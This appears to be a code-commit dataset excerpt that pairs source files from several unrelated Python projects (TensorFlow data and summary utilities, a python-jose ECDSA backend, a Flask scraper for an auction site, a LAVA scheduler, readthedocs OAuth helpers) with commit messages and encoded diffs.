# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Non-deterministic dataset transformations.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from tensorflow.python.data.ops import dataset_ops from tensorflow.python.data.util import nest from tensorflow.python.framework import dtypes from tensorflow.python.framework import function from tensorflow.python.framework import ops from tensorflow.python.ops import gen_dataset_ops class SloppyInterleaveDataset(dataset_ops.Dataset): """A `Dataset` that maps a function over its input and flattens the result.""" def __init__(self, input_dataset, map_func, cycle_length, block_length): """See `tf.contrib.data.sloppy_interleave()` for details.""" super(SloppyInterleaveDataset, self).__init__() self._input_dataset = input_dataset @function.Defun(*nest.flatten(input_dataset.output_types)) def tf_map_func(*args): """A wrapper for Defun that facilitates shape inference.""" # Pass in shape information from the input_dataset. for arg, shape in zip(args, nest.flatten(input_dataset.output_shapes)): arg.set_shape(shape) nested_args = nest.pack_sequence_as(input_dataset.output_types, args) if nest.is_sequence(nested_args): dataset = map_func(*nested_args) else: dataset = map_func(nested_args) if not isinstance(dataset, dataset_ops.Dataset): raise TypeError("`map_func` must return a `Dataset` object.") self._output_types = dataset.output_types self._output_shapes = dataset.output_shapes return dataset._as_variant_tensor() # pylint: disable=protected-access self._map_func = tf_map_func self._map_func.add_to_graph(ops.get_default_graph()) self._cycle_length = ops.convert_to_tensor( cycle_length, dtype=dtypes.int64, name="cycle_length") self._block_length = ops.convert_to_tensor( block_length, dtype=dtypes.int64, name="block_length") def _as_variant_tensor(self): return gen_dataset_ops.sloppy_interleave_dataset( self._input_dataset._as_variant_tensor(), # pylint: disable=protected-access self._map_func.captured_inputs, self._cycle_length, self._block_length, f=self._map_func, output_types=nest.flatten(self.output_types), output_shapes=nest.flatten(self.output_shapes)) @property def output_shapes(self): return self._output_shapes @property def output_types(self): return self._output_types def sloppy_interleave(map_func, cycle_length, block_length=1): """A non-deterministic version of the `Dataset.interleave()` transformation. `sloppy_interleave()` maps `map_func` across `dataset`, and non-deterministically interleaves the results. The resulting dataset is almost identical to `interleave`. The key difference is that if retrieving a value from a given output iterator would cause `get_next` to block, that iterator will be skipped, and consumed when next available. 
If consuming from all iterators would cause the `get_next` call to block, the `get_next` call blocks until the first value is available. If the underlying datasets produce elements as fast as they are consumed, the `sloppy_interleave` transformation behaves identically to `interleave`. However, if an underlying dataset would block the consumer, `sloppy_interleave` can violate the round-robin order (that `interleave` strictly obeys), producing an element from a different underlying dataset instead. WARNING: The order of elements in the resulting dataset is not deterministic. Use `Dataset.interleave()` if you want the elements to have a deterministic order. Args: map_func: A function mapping a nested structure of tensors (having shapes and types defined by `self.output_shapes` and `self.output_types`) to a `Dataset`. cycle_length: The number of threads to interleave from in parallel. block_length: The number of consecutive elements to pull from a thread before advancing to the next thread. Note: sloppy_interleave will skip the remainder of elements in the block_length in order to avoid blocking. Returns: A `Dataset` transformation function, which can be passed to @{tf.data.Dataset.apply}. """ def _apply_fn(dataset): return SloppyInterleaveDataset( dataset, map_func, cycle_length, block_length) return _apply_fn
Python
0.000001
@@ -4213,16 +4213,324 @@ stead.%0A%0A + Example usage:%0A%0A %60%60%60python%0A # Preprocess 4 files concurrently.%0A filenames = tf.data.Dataset.list_files(%22/path/to/data/train*.tfrecords%22)%0A dataset = filenames.apply(%0A tf.contrib.data.sloppy_interleave(%0A lambda filename: tf.data.TFRecordDataset(filename),%0A cycle_length=4))%0A %60%60%60%0A%0A WARNIN
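The diff is documentation-only: it inserts a usage example into the docstring between the blocking explanation and the determinism warning. The added snippet, decoded from the diff (TF 1.x contrib API, matching the module's own tf.contrib.data namespace):

import tensorflow as tf

# Preprocess 4 files concurrently.
filenames = tf.data.Dataset.list_files("/path/to/data/train*.tfrecords")
dataset = filenames.apply(
    tf.contrib.data.sloppy_interleave(
        lambda filename: tf.data.TFRecordDataset(filename),
        cycle_length=4))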
efe41c344873454223e952e8edc3886c3aa77b78
Fix compatibility issue - ecdsa Curve is not hashable. (#261)
jose/backends/ecdsa_backend.py
jose/backends/ecdsa_backend.py
import hashlib import ecdsa from jose.backends.base import Key from jose.constants import ALGORITHMS from jose.exceptions import JWKError from jose.utils import base64_to_long, long_to_base64 class ECDSAECKey(Key): """ Performs signing and verification operations using ECDSA and the specified hash function This class requires the ecdsa package to be installed. This is based off of the implementation in PyJWT 0.3.2 """ SHA256 = hashlib.sha256 SHA384 = hashlib.sha384 SHA512 = hashlib.sha512 CURVE_MAP = { SHA256: ecdsa.curves.NIST256p, SHA384: ecdsa.curves.NIST384p, SHA512: ecdsa.curves.NIST521p, } def __init__(self, key, algorithm): if algorithm not in ALGORITHMS.EC: raise JWKError("hash_alg: %s is not a valid hash algorithm" % algorithm) self.hash_alg = { ALGORITHMS.ES256: self.SHA256, ALGORITHMS.ES384: self.SHA384, ALGORITHMS.ES512: self.SHA512, }.get(algorithm) self._algorithm = algorithm self.curve = self.CURVE_MAP.get(self.hash_alg) if isinstance(key, (ecdsa.SigningKey, ecdsa.VerifyingKey)): self.prepared_key = key return if isinstance(key, dict): self.prepared_key = self._process_jwk(key) return if isinstance(key, str): key = key.encode("utf-8") if isinstance(key, bytes): # Attempt to load key. We don't know if it's # a Signing Key or a Verifying Key, so we try # the Verifying Key first. try: key = ecdsa.VerifyingKey.from_pem(key) except ecdsa.der.UnexpectedDER: key = ecdsa.SigningKey.from_pem(key) except Exception as e: raise JWKError(e) self.prepared_key = key return raise JWKError("Unable to parse an ECKey from key: %s" % key) def _process_jwk(self, jwk_dict): if not jwk_dict.get("kty") == "EC": raise JWKError("Incorrect key type. Expected: 'EC', Received: %s" % jwk_dict.get("kty")) if not all(k in jwk_dict for k in ["x", "y", "crv"]): raise JWKError("Mandatory parameters are missing") if "d" in jwk_dict: # We are dealing with a private key; the secret exponent is enough # to create an ecdsa key. d = base64_to_long(jwk_dict.get("d")) return ecdsa.keys.SigningKey.from_secret_exponent(d, self.curve) else: x = base64_to_long(jwk_dict.get("x")) y = base64_to_long(jwk_dict.get("y")) if not ecdsa.ecdsa.point_is_valid(self.curve.generator, x, y): raise JWKError(f"Point: {x}, {y} is not a valid point") point = ecdsa.ellipticcurve.Point(self.curve.curve, x, y, self.curve.order) return ecdsa.keys.VerifyingKey.from_public_point(point, self.curve) def sign(self, msg): return self.prepared_key.sign( msg, hashfunc=self.hash_alg, sigencode=ecdsa.util.sigencode_string, allow_truncate=False ) def verify(self, msg, sig): try: return self.prepared_key.verify( sig, msg, hashfunc=self.hash_alg, sigdecode=ecdsa.util.sigdecode_string, allow_truncate=False ) except Exception: return False def is_public(self): return isinstance(self.prepared_key, ecdsa.VerifyingKey) def public_key(self): if self.is_public(): return self return self.__class__(self.prepared_key.get_verifying_key(), self._algorithm) def to_pem(self): return self.prepared_key.to_pem() def to_dict(self): if not self.is_public(): public_key = self.prepared_key.get_verifying_key() else: public_key = self.prepared_key crv = { ecdsa.curves.NIST256p: "P-256", ecdsa.curves.NIST384p: "P-384", ecdsa.curves.NIST521p: "P-521", }[self.prepared_key.curve] # Calculate the key size in bytes. Section 6.2.1.2 and 6.2.1.3 of # RFC7518 prescribes that the 'x', 'y' and 'd' parameters of the curve # points must be encoded as octed-strings of this length. 
key_size = self.prepared_key.curve.baselen data = { "alg": self._algorithm, "kty": "EC", "crv": crv, "x": long_to_base64(public_key.pubkey.point.x(), size=key_size).decode("ASCII"), "y": long_to_base64(public_key.pubkey.point.y(), size=key_size).decode("ASCII"), } if not self.is_public(): data["d"] = long_to_base64(self.prepared_key.privkey.secret_multiplier, size=key_size).decode("ASCII") return data
Python
0
@@ -667,24 +667,176 @@ T521p,%0A %7D +%0A CURVE_NAMES = (%0A (ecdsa.curves.NIST256p, %22P-256%22),%0A (ecdsa.curves.NIST384p, %22P-384%22),%0A (ecdsa.curves.NIST521p, %22P-521%22),%0A ) %0A%0A def __ @@ -4081,17 +4081,16 @@ red_key%0A -%0A @@ -4095,17 +4095,20 @@ crv = -%7B +None %0A @@ -4112,142 +4112,181 @@ - ecdsa.curves.NIST256p: %22P-256%22,%0A ecdsa.curves.NIST384p: %22P-384%22,%0A ecdsa.curves.NIST521p: %22P-521%22,%0A %7D%5B +for key, value in self.CURVE_NAMES:%0A if key == self.prepared_key.curve:%0A crv = value%0A if not crv:%0A raise KeyError(f%22Can't match %7B self @@ -4304,17 +4304,19 @@ ey.curve -%5D +%7D%22) %0A%0A
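The compatibility break: newer python-ecdsa releases give Curve an __eq__ without a __hash__, so the `{curve: "P-256", ...}` dict in to_dict fails the moment a curve is used as a key. The patch trades the dict for a tuple of pairs plus a linear ==-scan, which works on both old and new ecdsa; extracted here as a standalone helper:

import ecdsa

CURVE_NAMES = (
    (ecdsa.curves.NIST256p, "P-256"),
    (ecdsa.curves.NIST384p, "P-384"),
    (ecdsa.curves.NIST521p, "P-521"),
)

def curve_name(curve):
    # == still works where hashing no longer does
    for key, value in CURVE_NAMES:
        if key == curve:
            return value
    raise KeyError("Can't match %s" % curve)

print(curve_name(ecdsa.curves.NIST256p))  # P-256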
7c788c868323aa8c6237caab208d726c5cce24ac
address first time new user condition where user_id may be none
cis/user.py
cis/user.py
"""First class object to represent a user and data about that user.""" import logging from cis.settings import get_config logger = logging.getLogger(__name__) class Profile(object): def __init__(self, boto_session=None, profile_data=None): """ :param boto_session: The boto session object from the constructor. :param profile_data: The decrypted user profile JSON. """ self.boto_session = boto_session self.config = get_config() self.profile_data = profile_data self.dynamodb_table = None @property def exists(self): if self._retrieve_from_vault() is not None: return True else: return False def retrieve_from_vault(self): logger.info( 'Attempting to retrieve the following from the vault: {}'.format( self.profile_data.get('user_id') ) ) if not self.dynamodb_table: self._connect_dynamo_db() user_key = {'user_id': self.profile_data.get('user_id')} response = self.dynamodb_table.get_item(Key=user_key) self.profile_data = response return response def store_in_vault(self): logger.info( 'Attempting storage of the following user to the vault: {}'.format( self.profile_data.get('user_id') ) ) if not self.dynamodb_table: self._connect_dynamo_db() response = self.dynamodb_table.put_item( Item=self.profile_data ) return (response['ResponseMetadata']['HTTPStatusCode'] is 200) def _connect_dynamo_db(self): """New up a dynamodb resource from boto session.""" dynamodb = self.boto_session.resource('dynamodb') dynamodb_table = self.config('dynamodb_table', namespace='cis') self.dynamodb_table = dynamodb.Table(dynamodb_table)
Python
0.000009
@@ -1056,16 +1056,54 @@ r_id')%7D%0A +%0A if user_key is not None:%0A @@ -1156,16 +1156,59 @@ er_key)%0A + else:%0A response = None%0A%0A
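Decoded, the patch wraps the DynamoDB get_item in a guard and returns None instead of querying with a missing key for first-time users. Worth noting: as committed, the guard tests user_key — a dict literal built on the previous line, which can never be None — so the effective check belongs on the user_id value itself. A sketch of that stricter form (hypothetical free function over the boto3 Table handle):

def retrieve_from_vault(dynamodb_table, profile_data):
    """Fetch a stored profile, or None for a first-time user with no user_id."""
    user_id = profile_data.get('user_id')
    if user_id is not None:
        return dynamodb_table.get_item(Key={'user_id': user_id})
    return None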
81833470d1eb831e27e9e34712b983efbc38a735
Convert entire table to cartesian
solar_neighbourhood/prepare_data_add_kinematics.py
solar_neighbourhood/prepare_data_add_kinematics.py
""" Add very large RV errors for stars with no known RVs. Convert to cartesian. """ import numpy as np import sys sys.path.insert(0, '..') from chronostar import tabletool from astropy.table import Table datafile = Table.read('../data/ScoCen_box_result.fits') d = tabletool.read(datafile) # Set missing radial velocities (nan) to 0 d['radial_velocity'] = np.nan_to_num(d['radial_velocity']) # Set missing radial velocity errors (nan) to 1e+10 d['radial_velocity_error'][np.isnan(d['radial_velocity_error'])] = 1e+4 print('Convert to cartesian') tabletool.convert_table_astro2cart(table=d, return_table=True) d.write('../data/ScoCen_box_result_15M_ready_for_bg_ols.fits') print('Cartesian written.', len(d))
Python
0.999999
@@ -259,25 +259,21 @@ s')%0Ad = -t +T able -tool .read(da
452ceaa37bd070704d6acb276fdf9e4f0a9b3c56
Add logging to platform for debugging
setupext/platform.py
setupext/platform.py
# -*- coding: utf-8 -*- # ***************************************************************************** # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # See NOTICE file for details. # # ***************************************************************************** import warnings import setupext import os import sys import sysconfig # This handles all of the work to make our platform specific extension options. def Platform(include_dirs=[], sources=[]): platform_specific = { 'include_dirs': include_dirs, 'sources': setupext.utils.find_sources(sources), } fallback_jni = os.path.join('native', 'jni_include') # try to include JNI first from eventually given JAVA_HOME, then from distributed java_home = os.getenv('JAVA_HOME', '') found_jni = False if os.path.exists(java_home): platform_specific['include_dirs'] += [os.path.join(java_home, 'include')] # check if jni.h can be found for d in platform_specific['include_dirs']: if os.path.exists(os.path.join(str(d), 'jni.h')): print("Found native jni.h at %s" % d) found_jni = True break if not found_jni: warnings.warn('Falling back to provided JNI headers, since your provided' ' JAVA_HOME "%s" does not provide jni.h' % java_home) if not found_jni: platform_specific['include_dirs'] += [fallback_jni] platform_specific['extra_link_args'] = [] if sys.platform == 'win32': platform_specific['libraries'] = ['Advapi32'] platform_specific['define_macros'] = [('WIN32', 1)] if sys.version > '3': platform_specific['extra_compile_args'] = [ '/Zi', '/EHsc', '/std:c++14'] else: platform_specific['extra_compile_args'] = ['/Zi', '/EHsc'] platform_specific['extra_link_args'] = ['/DEBUG'] jni_md_platform = 'win32' elif sys.platform == 'darwin': platform_specific['libraries'] = ['dl'] platform_specific['define_macros'] = [('MACOSX', 1)] platform_specific['extra_compile_args'] = ['-g0', '-std=c++11'] jni_md_platform = 'darwin' elif sys.platform.startswith('linux'): platform_specific['libraries'] = ['dl'] platform_specific['extra_compile_args'] = ['-g0', '-std=c++11'] jni_md_platform = 'linux' elif sys.platform.startswith('aix7'): platform_specific['libraries'] = ['dl'] platform_specific['extra_compile_args'] = ['-g3', '-std=c++11'] jni_md_platform = 'aix7' elif sys.platform.startswith('freebsd'): jni_md_platform = 'freebsd' else: jni_md_platform = None warnings.warn("Your platform %s is not being handled explicitly." " It may work or not!" % sys.platform, UserWarning) platform_specific['extra_link_args'].append(sysconfig.get_config_var('BLDLIBRARY')) if found_jni: platform_specific['include_dirs'] += \ [os.path.join(java_home, 'include', jni_md_platform)] return platform_specific # include this stolen from FindJNI.cmake """ FIND_PATH(JAVA_INCLUDE_PATH2 jni_md.h ${JAVA_INCLUDE_PATH} ${JAVA_INCLUDE_PATH}/win32 ${JAVA_INCLUDE_PATH}/linux ${JAVA_INCLUDE_PATH}/freebsd ${JAVA_INCLUDE_PATH}/solaris ${JAVA_INCLUDE_PATH}/hp-ux ${JAVA_INCLUDE_PATH}/alpha )"""
Python
0.000001
@@ -847,16 +847,37 @@ ysconfig +%0Aimport distutils.log %0A%0A# This @@ -1620,13 +1620,26 @@ -print +distutils.log.info (%22Fo @@ -1765,32 +1765,37 @@ -warnings +distutils.log .warn('Falli @@ -1848,16 +1848,21 @@ ovided'%0A + @@ -2075,35 +2075,148 @@ -if sys.platform == 'win32': +distutils.log.info(%22Configure platform to%22, sys.platform)%0A if sys.platform == 'win32':%0A distutils.log.info(%22Add windows settings%22) %0A @@ -2671,16 +2671,66 @@ arwin':%0A + distutils.log.info(%22Add darwin settings%22)%0A @@ -2977,24 +2977,73 @@ h('linux'):%0A + distutils.log.info(%22Add linux settings%22)%0A plat @@ -3223,24 +3223,71 @@ th('aix7'):%0A + distutils.log.info(%22Add aix settings%22)%0A plat @@ -3469,24 +3469,75 @@ 'freebsd'):%0A + distutils.log.info(%22Add freebsd settings%22)%0A jni_ @@ -3610,24 +3610,29 @@ -warnings +distutils.log .warn(%22Y @@ -3681,16 +3681,21 @@ citly.%22%0A + @@ -3860,32 +3860,137 @@ if found_jni:%0A + distutils.log.info(%22Add JNI directory %25s%22 %25 os.path.join(java_home, 'include', jni_md_platform))%0A platform
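Every print and warnings.warn becomes a distutils.log call, plus a breadcrumb per platform branch, so the diagnostics follow setup.py's -v/-q verbosity instead of always printing. One caveat: distutils.log applies msg % args when extra positional args are passed, and calls like distutils.log.info("Configure platform to", sys.platform) lack a %s placeholder — they only avoid a TypeError because INFO sits below the default WARN threshold. A placeholder-correct sketch:

import distutils.log
import sys

distutils.log.set_threshold(distutils.log.INFO)  # surface INFO messages
distutils.log.info("Configure platform to %s", sys.platform)
if sys.platform.startswith('linux'):
    distutils.log.info("Add linux settings")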
0700e25b4dce989fcfc6ee367c7516578c8aaf5b
Update heartbeat in idle times
lava_scheduler_daemon/service.py
lava_scheduler_daemon/service.py
# Copyright (C) 2013 Linaro Limited # # Author: Senthil Kumaran <[email protected]> # # This file is part of LAVA Scheduler. # # LAVA Scheduler is free software: you can redistribute it and/or modify it # under the terms of the GNU Affero General Public License version 3 as # published by the Free Software Foundation # # LAVA Scheduler is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY # or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for # more details. # # You should have received a copy of the GNU Affero General Public License # along with LAVA Scheduler. If not, see <http://www.gnu.org/licenses/>. import logging import xmlrpclib from twisted.application.service import Service from twisted.internet import defer from twisted.internet.task import LoopingCall from lava_scheduler_app import utils from lava_scheduler_daemon.job import JobRunner, catchall_errback from lava_scheduler_daemon.worker import WorkerData class JobQueue(Service): def __init__(self, source, dispatcher, reactor, daemon_options): self.logger = logging.getLogger(__name__ + '.JobQueue') self.source = source self.dispatcher = dispatcher self.reactor = reactor self.daemon_options = daemon_options self._check_job_call = LoopingCall(self._checkJobs) self._check_job_call.clock = reactor def _checkJobs(self): self.logger.debug("Refreshing jobs") return self.source.getJobList().addCallback( self._startJobs).addErrback(catchall_errback(self.logger)) def _startJobs(self, jobs): # Update Worker Heartbeat # # NOTE: This will recide here till we finalize scheduler refactoring # and a separte module for worker specific daemon gets created. worker = WorkerData() # Record the scheduler tick (timestamp). worker.record_master_scheduler_tick() try: worker.put_heartbeat_data() except (xmlrpclib.Fault, xmlrpclib.ProtocolError) as err: worker.logger.error("Heartbeat update failed!") for job in jobs: new_job = JobRunner(self.source, job, self.dispatcher, self.reactor, self.daemon_options) self.logger.info("Starting Job: %d " % job.id) new_job.start() def startService(self): self.logger.info("\n\nLAVA Scheduler starting\n\n") self._check_job_call.start(20) def stopService(self): self._check_job_call.stop() return None
Python
0.000003
@@ -1476,210 +1476,8 @@ f):%0A - self.logger.debug(%22Refreshing jobs%22)%0A return self.source.getJobList().addCallback(%0A self._startJobs).addErrback(catchall_errback(self.logger))%0A%0A def _startJobs(self, jobs):%0A @@ -1506,16 +1506,16 @@ artbeat%0A + @@ -1671,16 +1671,62 @@ reated.%0A + self.logger.debug(%22Worker heartbeat%22)%0A @@ -2024,16 +2024,218 @@ led!%22)%0A%0A + self.logger.debug(%22Refreshing jobs%22)%0A return self.source.getJobList().addCallback(%0A self._startJobs).addErrback(catchall_errback(self.logger))%0A%0A def _startJobs(self, jobs):%0A
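The heartbeat block moves from the _startJobs callback into _checkJobs itself, so it fires at the top of every 20-second scheduler tick, before the job query, rather than only after getJobList succeeds — per the subject, covering idle periods. Shape of the patched method (sketch using the module's own collaborators):

def _checkJobs(self):
    # Heartbeat first, so idle ticks still report in.
    self.logger.debug("Worker heartbeat")
    worker = WorkerData()
    worker.record_master_scheduler_tick()
    try:
        worker.put_heartbeat_data()
    except (xmlrpclib.Fault, xmlrpclib.ProtocolError):
        worker.logger.error("Heartbeat update failed!")

    self.logger.debug("Refreshing jobs")
    return self.source.getJobList().addCallback(
        self._startJobs).addErrback(catchall_errback(self.logger))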
5874429ac469f18067243bb6f35a0c27bf4a1a2f
Fix error in ajax item
aukro/core.py
aukro/core.py
#!/usr/bin/env python # -*- coding: utf-8 -*- from flask import Blueprint, jsonify, render_template, request, url_for from aukro import app, db from aukro.parser import Parser import re # create blueprint core = Blueprint("core", __name__, template_folder="templates") @core.route("/") def index(): return render_template("index.html") @core.route("/seller/") def seller(): search = request.args.get("search", "") seller = {} # init parser parser = Parser(charset="utf-8") # try to find seller id data = parser.data(search) if data and "uid" in data: seller['id'] = data["uid"] else: try: page = parser.grab(search, tree=False) except: error = dict(reason=u"Не удалось найти продавца", details=u"Неправильная ссылка или нет связи с сервером") return render_template("seller.html", error=error) result = re.search("data-seller=[\"\']([0-9]+)[\"\']", page, flags=re.I | re.M) if result and result.group(1): seller['id']= result.group(1) else: error = dict(reason=u"Не удалось найти продавца", details=u"Неправильная ссылка") return render_template("seller.html", error=error) #request seller info page try: page = parser.grab("http://aukro.ua/show_user.php?uid=%s&type=fb_seller" % seller['id']) except: error = dict(reason=u"Не удалось найти информацию о продавце", details=u"Нет связи с сервером") return render_template("seller.html", error=error) try: el = page.cssselect(".main-title .user .uname") if el: seller['name'] = el[0].text_content().strip() el = page.cssselect(".main-title .user .user-rating") if el: seller['rating'] = el[0].text_content().strip() el = page.cssselect(".feedbacksSummary table") if el: seller['info'] = parser.html(el[0]) except: error = dict(reason=u"Не удалось найти информацию о продавце", details=u"Нет нужной информации на странице") return render_template("seller.html", error=error) return render_template("seller.html", seller=seller) @core.route("/ajax/item/") def ajax_seller_list(id, count=9999): link = request.args.get("link", "") result = [] # init parser parser = Parser(charset="utf-8") #request item page try: page = parser.grab(link) except: error = dict(reason=u"Не удалось найти страницу товара", details=u"Неправильная ссылка или нет связи с сервером") return jsonify(error=error) try: el = page.cssselect(".product.productwide h1 [itemprop='name']") if el: result['name'] = el[0].text_content().strip() el = page.cssselect(".product.productwide .main meta[itemprop='price']") if el: result['price'] = el[0].get("content") el = page.cssselect(".product.productwide .main meta[itemprop='priceCurrency']") if el: result['currency'] = el[0].get("content") except: error = dict(reason=u"Не удалось найти информацию о товаре", details=u"Нет нужной информации на странице") return jsonify(error=error) return jsonify(result=result) @core.route("/ajax/seller/<int:id>/list/<int:count>/") def ajax_seller_list(id, count=9999): page_number = 1 result = [] # init parser parser = Parser(charset="utf-8") while len(result) < count: #request seller info page try: page = parser.grab("http://aukro.ua/show_user.php?uid=%s&type=fb_seller&p=%s" % (id, page_number)) except: error = dict(reason=u"Не удалось загрузить список", details=u"Нет связи с сервером") return jsonify(error=error) try: for el in page.cssselect(".feedbacks-row"): rows = el.cssselect("td") if rows and len(rows) >= 4: data = dict(datetime=rows[2].text_content().strip(), type=rows[1].text_content().strip(), item=rows[3].text_content().strip(), link=rows[3].cssselect("a")[0].get("href")) result.append(data) except: pass if 
page.cssselect(".pagination li.next"): page_number += 1 else: break return jsonify(result=result)
Python
0.000002
@@ -2228,34 +2228,13 @@ jax_ -seller_list(id, count=9999 +item( ):%0A @@ -2277,34 +2277,34 @@ %22)%0A result = -%5B%5D +%7B%7D %0A%0A # init par @@ -2623,32 +2623,12 @@ ct(%22 -.product.productwide h1 +meta %5Bite @@ -2693,37 +2693,29 @@ = el%5B0%5D. -text_ +get(%22 content -().strip( +%22 )%0A%0A @@ -2742,35 +2742,8 @@ ct(%22 -.product.productwide .main meta @@ -2863,35 +2863,8 @@ ct(%22 -.product.productwide .main meta
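The diff above corrects two defects in the old contents: the /ajax/item/ handler reused the name ajax_seller_list (so the later definition shadowed it and the route pointed at a function expecting URL arguments it never received), and result was initialized as a list while being assigned string keys. A minimal sketch of the corrected accumulation pattern; the field names come from the record, the helper itself is illustrative:

# Accumulate optional fields in a dict, not a list: result['name'] on a
# list raises TypeError, which is what the "result = [] -> result = {}"
# hunk fixes.
def extract_item(fields):
    result = {}
    if "name" in fields:
        result["name"] = fields["name"].strip()
    if "price" in fields:
        result["price"] = fields["price"]
    return result

print(extract_item({"name": "  Widget ", "price": "9.99"}))
# {'name': 'Widget', 'price': '9.99'}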
fedb3768539259568555d5a62d503c7995f4b9a2
Handle orgs that you don’t own personally.
readthedocs/oauth/utils.py
readthedocs/oauth/utils.py
import logging

from .models import GithubProject, GithubOrganization

log = logging.getLogger(__name__)


def make_github_project(user, org, privacy, repo_json):
    if (repo_json['private'] is True and privacy == 'private' or
            repo_json['private'] is False and privacy == 'public'):
        project, created = GithubProject.objects.get_or_create(
            user=user,
            organization=org,
            full_name=repo_json['full_name'],
        )
        project.name = repo_json['name']
        project.description = repo_json['description']
        project.git_url = repo_json['git_url']
        project.ssh_url = repo_json['ssh_url']
        project.html_url = repo_json['html_url']
        project.json = repo_json
        project.save()
        return project
    else:
        log.debug('Not importing %s because mismatched type' % repo_json['name'])


def make_github_organization(user, org_json):
    org, created = GithubOrganization.objects.get_or_create(
        login=org_json.get('login'),
        html_url=org_json.get('html_url'),
        name=org_json.get('name'),
        email=org_json.get('email'),
        json=org_json,
    )
    org.users.add(user)
    return org
Python
0
@@ -368,18 +368,84 @@ -user= +full_name=repo_json%5B'full_name'%5D,%0A )%0A if project.user != user -, +: %0A @@ -457,25 +457,170 @@ -organization=org, +log.debug('Not importing %25s because mismatched user' %25 repo_json%5B'name'%5D)%0A return None%0A if project.organization and project.organization != org: %0A @@ -624,34 +624,79 @@ -full_name= +log.debug('Not importing %25s because mismatched orgs' %25 repo_json%5B'f @@ -694,38 +694,80 @@ o_json%5B' -full_ name'%5D -,%0A ) +)%0A return None%0A project.organization=org %0A
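The diff drops user and organization from the get_or_create lookup, keying only on full_name, and then bails out when the existing row is owned by a different user or attached to a different organization. A reduced sketch of that guard-clause pattern with a plain dict standing in for the ORM; all names here are illustrative:

# Look the record up by its natural key, then refuse to touch it when
# ownership does not match, mirroring the two early returns in the diff.
def claim_project(projects, full_name, user, org):
    project = projects.setdefault(full_name, {"user": user, "org": None})
    if project["user"] != user:
        return None  # mismatched user: log and skip in the real code
    if project["org"] is not None and project["org"] != org:
        return None  # mismatched organization
    project["org"] = org
    return project

registry = {}
print(claim_project(registry, "org/repo", "alice", "org"))    # claimed
print(claim_project(registry, "org/repo", "mallory", "org"))  # None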
b23415e3f3c34c3911e4e05758a41a81e5882453
Replace space in "Fraction of Zero Values" with _ because using a space is illegal and will be auto-replaced.
tensorflow/contrib/slim/python/slim/summaries.py
tensorflow/contrib/slim/python/slim/summaries.py
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains helper functions for creating summaries.

This module contains various helper functions for quickly and easily adding
tensorflow summaries. These allow users to print summary values
automatically as they are computed and add prefixes to collections of
summaries.

Example usage:

  import tensorflow as tf
  slim = tf.contrib.slim

  slim.summaries.add_histogram_summaries(slim.variables.get_model_variables())
  slim.summaries.add_scalar_summary(total_loss, 'Total Loss')
  slim.summaries.add_scalar_summary(learning_rate, 'Learning Rate')
  slim.summaries.add_histogram_summaries(my_tensors)
  slim.summaries.add_zero_fraction_summaries(my_tensors)
"""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

from tensorflow.python.framework import ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import nn_impl as nn
from tensorflow.python.summary import summary


def _get_summary_name(tensor, name=None, prefix=None, postfix=None):
  """Produces the summary name given.

  Args:
    tensor: A variable or op `Tensor`.
    name: The optional name for the summary.
    prefix: An optional prefix for the summary name.
    postfix: An optional postfix for the summary name.

  Returns:
    a summary name.
  """
  if not name:
    name = tensor.op.name
  if prefix:
    name = prefix + '/' + name
  if postfix:
    name = name + '/' + postfix
  return name


def add_histogram_summary(tensor, name=None, prefix=None):
  """Adds a histogram summary for the given tensor.

  Args:
    tensor: A variable or op tensor.
    name: The optional name for the summary.
    prefix: An optional prefix for the summary names.

  Returns:
    A scalar `Tensor` of type `string` whose contents are the serialized
    `Summary` protocol buffer.
  """
  return summary.histogram(
      _get_summary_name(tensor, name, prefix), tensor)


def add_image_summary(tensor, name=None, prefix=None, print_summary=False):
  """Adds an image summary for the given tensor.

  Args:
    tensor: a variable or op tensor with shape [batch,height,width,channels]
    name: the optional name for the summary.
    prefix: An optional prefix for the summary names.
    print_summary: If `True`, the summary is printed to stdout when the
      summary is computed.

  Returns:
    An image `Tensor` of type `string` whose contents are the serialized
    `Summary` protocol buffer.
  """
  summary_name = _get_summary_name(tensor, name, prefix)
  # If print_summary, then we need to make sure that this call doesn't add the
  # non-printing op to the collection. We'll add it to the collection later.
  collections = [] if print_summary else None
  op = summary.image(
      name=summary_name, tensor=tensor, collections=collections)
  if print_summary:
    op = logging_ops.Print(op, [tensor], summary_name)
    ops.add_to_collection(ops.GraphKeys.SUMMARIES, op)
  return op


def add_scalar_summary(tensor, name=None, prefix=None, print_summary=False):
  """Adds a scalar summary for the given tensor.

  Args:
    tensor: a variable or op tensor.
    name: the optional name for the summary.
    prefix: An optional prefix for the summary names.
    print_summary: If `True`, the summary is printed to stdout when the
      summary is computed.

  Returns:
    A scalar `Tensor` of type `string` whose contents are the serialized
    `Summary` protocol buffer.
  """
  collections = [] if print_summary else None
  summary_name = _get_summary_name(tensor, name, prefix)

  # If print_summary, then we need to make sure that this call doesn't add the
  # non-printing op to the collection. We'll add it to the collection later.
  op = summary.scalar(
      name=summary_name, tensor=tensor, collections=collections)

  if print_summary:
    op = logging_ops.Print(op, [tensor], summary_name)
